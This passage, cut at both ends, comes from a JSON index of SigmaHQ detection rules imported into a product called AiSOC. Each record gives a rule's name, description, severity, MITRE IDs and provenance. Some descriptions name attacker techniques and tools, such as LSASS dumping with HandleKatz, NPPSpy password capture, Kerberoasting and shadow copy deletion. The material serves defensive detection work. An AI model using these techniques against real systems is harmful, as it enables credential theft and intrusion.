"detections/sigma-imports/_quarantine/suspicious-reconnaissance-activity-using-get-localgroupmember-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml" } }, { "id": "sigmahq-sigma-c8b00925-926c-47e3-beea-298fd563728e", "type": "detection", "name": "Remote Access Tool Services Have Been Installed - Security", "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-services-have-been-installed-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8b00925-926c-47e3-beea-298fd563728e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_service_install_remote_access_software.yml" } }, { "id": "sigmahq-sigma-c8da0dfd-4ed0-4b68-962d-13c9c884384e", "type": "detection", "name": "Potential Credential Dumping Via LSASS Process Clone", "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-via-lsass-process-clone.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml" } }, { "id": "sigmahq-sigma-c8e35e96-19ce-4f16-aeb6-fd5588dc5365", "type": "detection", "name": "Suspicious Named Error", "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-named-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/syslog/lnx_syslog_susp_named.yml" } }, { "id": "sigmahq-sigma-c90362e0-2df3-4e61-94fe-b37615814cb1", "type": "detection", "name": "Potential Persistence Via Netsh Helper DLL - Registry", "description": "Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-netsh-helper-dll-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c90362e0-2df3-4e61-94fe-b37615814cb1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml" } }, { "id": "sigmahq-sigma-c9192ad9-75e5-43eb-8647-82a0a5b493e3", "type": "detection", "name": "PUA - Mouse Lock Execution", "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-mouse-lock-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml" } }, { "id": "sigmahq-sigma-c92c24e7-f595-493f-9c98-53d5142f5c18", "type": "detection", "name": "CodeIntegrity - Unsigned Image Loaded", "description": "Detects loaded unsigned image on the system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-unsigned-image-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c92c24e7-f595-493f-9c98-53d5142f5c18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml" } }, { "id": "sigmahq-sigma-c947b146-0abc-4c87-9c64-b17e9d7274a2", "type": "detection", "name": "Shadow Copies Deletion Using Operating Systems Utilities", "description": "Shadow Copies deletion using operating systems utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1070", "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/shadow-copies-deletion-using-operating-systems-utilities.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml" } }, { "id": "sigmahq-sigma-c977cb50-3dff-4a9f-b873-9290f56132f1", "type": "detection", "name": "AppX Located in Uncommon Directory Added to Deployment Pipeline", "description": "Detects an appx package that was added to the pipeline of the \"to be processed\" packages that is located in uncommon locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/appx-located-in-uncommon-directory-added-to-deployment-pipeline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c977cb50-3dff-4a9f-b873-9290f56132f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml" } }, { "id": "sigmahq-sigma-c9783e20-4793-4164-ba96-d9ee483992c4", "type": "detection", "name": "Logged-On User Password Change Via Ksetup.EXE", "description": "Detects password change for the logged-on user's via \"ksetup.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/logged-on-user-password-change-via-ksetup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9783e20-4793-4164-ba96-d9ee483992c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ksetup_password_change_user.yml" } }, { "id": "sigmahq-sigma-c98f2a0d-e1b8-4f76-90d3-359caf88d6b9", "type": "detection", "name": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2", "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-activity-via-emoji-usage-in-commandline-2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c98f2a0d-e1b8-4f76-90d3-359caf88d6b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_2.yml" } }, { "id": "sigmahq-sigma-c9a88268-0047-4824-ba6e-4d81ce0b907c", "type": "detection", "name": "Antivirus Relevant File Paths Alerts", "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/antivirus-relevant-file-paths-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9a88268-0047-4824-ba6e-4d81ce0b907c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_relevant_files.yml" } }, { "id": "sigmahq-sigma-c9d8b7fd-78e4-44fe-88f6-599135d46d60", "type": "detection", "name": "Security Software Discovery - Linux", "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-software-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" } }, { "id": "sigmahq-sigma-c9eb55c3-b468-40ab-9089-db2862e42137", "type": "detection", "name": "Device Installation Blocked", "description": "Detects an installation of a device that is forbidden by the system policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/device-installation-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9eb55c3-b468-40ab-9089-db2862e42137", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_device_installation_blocked.yml" } }, { "id": "sigmahq-sigma-c9fbe8e9-119d-40a6-9b59-dd58a5d84429", "type": "detection", "name": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1542.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ransomware-or-unauthorized-mbr-tampering-via-bcdedit-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml" } }, { "id": "sigmahq-sigma-ca2092a1-c273-4878-9b4b-0d60115bf5ea", "type": "detection", "name": "Suspicious Encoded PowerShell Command Line", "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-encoded-powershell-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml" } }, { "id": "sigmahq-sigma-ca387a8e-1c84-4da3-9993-028b45342d30", "type": "detection", "name": "PUA - SoftPerfect Netscan Execution", "description": "Detects usage of SoftPerfect's \"netscan.exe\". An application for scanning networks.\nIt is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-softperfect-netscan-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca387a8e-1c84-4da3-9993-028b45342d30", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_netscan.yml" } }, { "id": "sigmahq-sigma-ca5583e9-8f80-46ac-ab91-7f314d13b984", "type": "detection", "name": "Potentially Suspicious Child Process of KeyScrambler.exe", "description": "Detects potentially suspicious child processes of KeyScrambler.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-keyscrambler-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca5583e9-8f80-46ac-ab91-7f314d13b984", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_keyscrambler_susp_child_process.yml" } }, { "id": "sigmahq-sigma-ca621ba5-54ab-4035-9942-d378e6fcde3c", "type": "detection", "name": "HackTool - HandleKatz LSASS Dumper Execution", "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-handlekatz-lsass-dumper-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_handlekatz.yml" } }, { "id": "sigmahq-sigma-ca8b77a9-d499-4095-b793-5d5f330d450e", "type": "detection", "name": "PowerShell Credential Prompt", "description": "Detects PowerShell calling a credential prompt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-credential-prompt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca8b77a9-d499-4095-b793-5d5f330d450e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" } }, { "id": "sigmahq-sigma-ca94a6db-8106-4737-9ed2-3e3bb826af0a", "type": "detection", "name": "Password Policy Discovery - Linux", "description": "Detects password policy discovery commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/password-policy-discovery-linux.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" } }, { "id": "sigmahq-sigma-ca9bf243-465e-494a-9e54-bf9fc239057d", "type": "detection", "name": "Azure Subscription Permission Elevation Via AuditLogs", "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-subscription-permission-elevation-via-auditlogs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca9bf243-465e-494a-9e54-bf9fc239057d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml" } }, { "id": "sigmahq-sigma-caa02837-f659-466f-bca6-48bde2826ab4", "type": "detection", "name": "Potential DLL Sideloading Via ClassicExplorer32.dll", "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-classicexplorer32-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "caa02837-f659-466f-bca6-48bde2826ab4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_classicexplorer32.yml" } }, { "id": "sigmahq-sigma-caa06de8-fdef-4c91-826a-7f9e163eef4b", "type": "detection", "name": "RunDLL32 Spawning Explorer", "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-spawning-explorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_spawn_explorer.yml" } }, { "id": "sigmahq-sigma-caa9a802-8bd8-4b9e-a5cd-4d6221670219", "type": "detection", "name": "Suspicious Kerberos Ticket Request via CLI", "description": "Detects suspicious Kerberos ticket requests via command line using System.IdentityModel.Tokens.KerberosRequestorSecurityToken class.\nThreat actors may use command line interfaces to request Kerberos tickets for service accounts in order to\nperform offline password cracking attacks commonly known as Kerberoasting or other Kerberos ticket abuse\ntechniques like silver ticket attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-kerberos-ticket-request-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "caa9a802-8bd8-4b9e-a5cd-4d6221670219", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_kerberos_kerberos_ticket_request_via_cli.yml" } }, { "id": "sigmahq-sigma-cacef8fc-9d3d-41f7-956d-455c6e881bc5", "type": "detection", "name": "Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock", "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remotefxvgpudisablement-exe-abuse-powershell-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cacef8fc-9d3d-41f7-956d-455c6e881bc5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml" } }, { "id": "sigmahq-sigma-cad1fe90-2406-44dc-bd03-59d0b58fe722", "type": "detection", "name": "HackTool - NPPSpy Hacktool Usage", "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-nppspy-hacktool-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" } }, { "id": "sigmahq-sigma-cae80281-ef23-44c5-873b-fd48d2666f49", "type": "detection", "name": "PowerShell Script Change Permission Via Set-Acl - PsScript", "description": "Detects PowerShell scripts set ACL to of a file or a folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-change-permission-via-set-acl-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cae80281-ef23-44c5-873b-fd48d2666f49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_set_acl.yml" } }, { "id": "sigmahq-sigma-caf201a9-c2ce-4a26-9c3a-2b9525413711", "type": "detection", "name": "Potentially Suspicious Call To Win32_NTEventlogFile Class", "description": "Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-call-to-win32-nteventlogfile-class.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "caf201a9-c2ce-4a26-9c3a-2b9525413711", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml" } }, { "id": "sigmahq-sigma-cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "type": "detection", "name": "PrintBrm ZIP Creation of Extraction", "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/printbrm-zip-creation-of-extraction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" } }, { "id": "sigmahq-sigma-cb0fe7c5-f3a3-484d-aa25-d350a7912729", "type": "detection", "name": "Suspicious Driver/DLL Installation Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with the \"INSTALLDRIVER\" action where the driver doesn't contain a \".dll\" extension. This is often used as a defense evasion method.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-driver-dll-installation-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb0fe7c5-f3a3-484d-aa25-d350a7912729", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml" } }, { "id": 